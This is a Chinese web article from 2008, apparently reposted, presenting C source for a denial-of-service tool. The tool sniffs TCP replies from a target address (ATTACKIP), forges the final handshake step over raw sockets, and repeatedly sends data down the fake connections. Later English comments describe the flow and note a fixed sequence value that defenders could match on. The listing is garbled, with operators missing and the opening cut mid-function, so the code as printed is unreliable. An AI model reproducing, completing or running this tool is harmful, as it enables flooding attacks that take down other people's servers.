
新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

来源:互联网 作者:west263.com 时间:2008-04-16

DWORD dwIP=0;
int i=0;
struct hostent* lp = NULL;
char HostName[255] = {0};
gethostname(HostName,255);
lp = gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
i ;
dwIP = *(DWORD*)lp->h_addr_list[--i];
return dwIP;
}

// checksum: sums a buffer as 16-bit words and returns the bitwise complement
// of the result truncated to 16 bits (see the final return).
//
// buffer - data to sum, read as USHORT words
// size   - number of bytes in buffer (decremented by sizeof(USHORT) per word)
//
// NOTE(review): the shape matches the standard one's-complement Internet
// checksum (RFC 1071), but the listing is not valid C as printed: the fold
// expression below has two operands with no operator between them, so
// characters appear to have been lost when the page was extracted.
// The code is left exactly as found.
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
// word loop: runs while at least two bytes remain
while(size >1)
{
cksum =*buffer ;
size -=sizeof(USHORT);
}
// one odd trailing byte, if any
if(size)
{
cksum = *(UCHAR*)buffer;
}
// presumably folds the carries above bit 15 back into the low 16 bits
cksum = (cksum >> 16) (cksum & 0xffff);
cksum = (cksum >>16);
return (USHORT)(~cksum);
} DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
// ListeningFunc: thread routine that reads inbound IP packets from a raw
// socket and answers selected TCP segments through SendData().
//
// lpvoid - cast to DWORD and used as the local IPv4 address to bind to.
//
// Flow visible in this listing:
//   1. open a raw IP socket, bind it to lpvoid with port 8288, and request
//      SIO_RCVALL on it;
//   2. for every received packet whose protocol is TCP and whose source
//      address equals ATTACKIP, look at th_flag;
//   3. th_flag 0x12 (SYN+ACK) with th_ack == htonl(0x00198289): call SendData
//      twice, first with pBuf NULL, then with psend/len;
//   4. th_flag 0x10 (ACK): call SendData again with psend/len.
// ATTACKIP, psend, len, IPHEADER and TCPHEADER are defined outside this
// listing.
//
// Defender's view: the SYN+ACK branch only fires when the acknowledgment
// number is the constant 0x00198289, and that same value is passed on as SEQ
// to SendData, so handshakes completed through this path carry a fixed
// sequence number — a stable value to match on in network detection.
//
// NOTE(review): the listing is not compilable as printed (operators and
// line-continuation characters appear to have been lost in extraction); it is
// left exactly as found. The WSAIoctl result is not checked, and the receive
// loop has no exit condition.
SOCKET rawsock;
SOCKADDR_IN addr_in={0};
if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Sniffer Socket Setup Error!/n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(8288);
addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
// bind rawsock to the local IP and port
int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
if(ret==SOCKET_ERROR)
{
printf("bind false/n");
exit(0);
}
DWORD lpvBuffer = 1;
DWORD lpcbBytesReturned = 0;
WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL);
while (TRUE)
{
SOCKADDR_IN from={0};
int size=sizeof(from);
char RecvBuf[256]={0};
// receive a packet
ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct sockaddr*)&from,&size);
if(ret!=SOCKET_ERROR)
{
// parse the packet
IPHEADER *lpIPheader;
lpIPheader=(IPHEADER *)RecvBuf;
if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(ATTACKIP) )
{

TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf sizeof(IPHEADER));
// check whether this packet is a reply from an open remote port
if ( lpTCPheader->th_flag==0x12)
{
if ( lpTCPheader->th_ack == htonl(0x00198289) )
{// forge the third step of the handshake
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq) 1), /
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
// proactively send data once
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq) 1), /
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}

}
else
{
if ( lpTCPheader->th_flag == 0x10 )
// keep sending data
SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,/
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
} }

}
} // end while } void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{

SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader; char szSendBuf[1024]={0};
addr_in.sin_family=AF_INET;
addr_in.sin_port = APort;
addr_in.sin_addr.S_un.S_addr = AIP;
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0; ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=AIP;
ipHeader.sourceIP = SIP;
tcpHeader.th_dport = APort;
tcpHeader.th_ack = ACK;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_seq= SEQ;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_sport=SPort;
ipHeader.total_len=htons(sizeof(ipHeader) sizeof(tcpHeader) dwSize);
if ( !Isdata)
{ tcpHeader.th_flag=0x10;

}// ack
else
{
tcpHeader.th_flag=0x18;
}
tcpHeader.th_urp=0;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
if ( pBuf != NULL )
{
memcpy(szSendBuf sizeof(psdHeader) sizeof(tcpHeader),pBuf,dwSize);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader) sizeof(tcpHeader) dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)dwSize);
}
else
{
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader) sizeof(tcpHeader));
} memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
int rect=0;
if ( pBuf == NULL )
rect=sendto(sock, szSendBuf, sizeof(ipHeader) sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
else
{
memcpy(szSendBuf sizeof(ipHeader) sizeof(tcpHeader), pBuf, dwSize);
rect=sendto(sock, szSendBuf, sizeof(ipHeader) sizeof(tcpHeader) dwSize, 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
} if (rect==SOCKET_ERROR)
{
printf("send error!:%x/n",WSAGetLastError());
return;
}
else
{
if ( pBuf != NULL )
printf("SendData ok %d/n",ntohs(SPort));
else
printf(" SendAck ok %d/n",ntohs(SPort));
